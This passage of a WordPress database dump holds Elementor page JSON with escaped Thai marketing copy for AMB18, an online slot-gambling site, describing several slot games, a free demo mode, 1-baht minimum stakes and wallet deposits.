\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3290,429,'_thumbnail_id','371'),(3291,429,'_elementor_edit_mode','builder'),(3292,429,'_elementor_template_type','wp-page'),(3293,429,'_elementor_version','3.35.5'),(3294,429,'_elementor_pro_version','3.32.3'),(3295,429,'_wp_page_template','default'),(3296,429,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3297,429,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 